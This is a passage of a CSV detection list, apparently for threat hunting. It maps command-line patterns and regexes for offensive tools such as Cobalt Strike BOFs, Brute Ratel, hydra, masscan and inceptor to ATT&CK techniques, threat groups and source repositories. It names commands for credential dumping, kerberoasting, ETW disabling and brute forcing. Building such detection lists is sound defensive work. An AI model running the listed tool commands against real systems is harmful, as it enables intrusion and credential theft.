TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#dnsquery","dns query field","10","10","N/A","N/A","N/A","N/A","63555"
"doc.po.*\.*","doc\.po\..{0,50}\\\..{0,1000}","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#dnsquery","dns query field","10","10","N/A","N/A","N/A","N/A","63556"
"doc.tx.*\.*","doc\.tx\..{0,50}\\\..{0,1000}","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#dnsquery","dns query field","10","10","N/A","N/A","N/A","N/A","63557"
"dumpwifi *","dumpwifi\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rvrsh3ll/BOF_Collection","1","0","N/A","N/A","10","10","635","57","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z","63558"
"etw stop*","etw\sstop","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","0","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","63559"
"fw_walk display*","fw_walk\sdisplay.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","0","N/A","N/A","10","10","103","15","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z","63560"
"fw_walk status*","fw_walk\sstatus.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","0","N/A","N/A","10","10","103","15","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z","63561"
"fw_walk total*","fw_walk\stotal.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","0","N/A","N/A","10","10","103","15","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z","63562"
"get-spns *","get\-spns\s.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","63563"
"hydra -*","hydra\s\-.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","63565"
"import boko*","import\sboko.{0,1000}","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/bashexplode/boko","1","0","N/A","N/A","N/A","1","71","13","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z","63566"
"inceptor*dotnet*","inceptor.{0,25}dotnet.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","63567"
"kerberoast *","kerberoast\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","63568"
"Ladon Mac * ","Ladon\sMac\s.{0,1000}\s","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","63569"
"Lapsdump *","Lapsdump\s.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","0","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","63570"
"LdapSignCheck *","LdapSignCheck\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/cube0x0/LdapSignCheck","1","0","N/A","N/A","10","10","189","25","2024-08-07T09:32:20Z","2022-02-24T20:25:31Z","63572"
"list_exports *.dll*","list_exports\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","63573"
"load *.cna","load\s.{0,1000}\.cna","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","63574"
"make_token *","make_token\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","63575"
"make_token *","make_token\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/m57/cobaltstrike_bofs","1","0","N/A","N/A","10","10","164","25","2022-07-23T20:37:52Z","2020-07-30T22:36:51Z","63576"
"masscan *","masscan\s.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","Black Basta - Unit 29155 - Akira - EMBER BEAR","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","#linux","N/A","N/A","10","24345","3118","2024-12-13T12:22:18Z","2013-07-28T05:35:33Z","63577"
"memdump *","memdump\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","63578"
"memex /*.exe*","memex\s\/.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","63579"
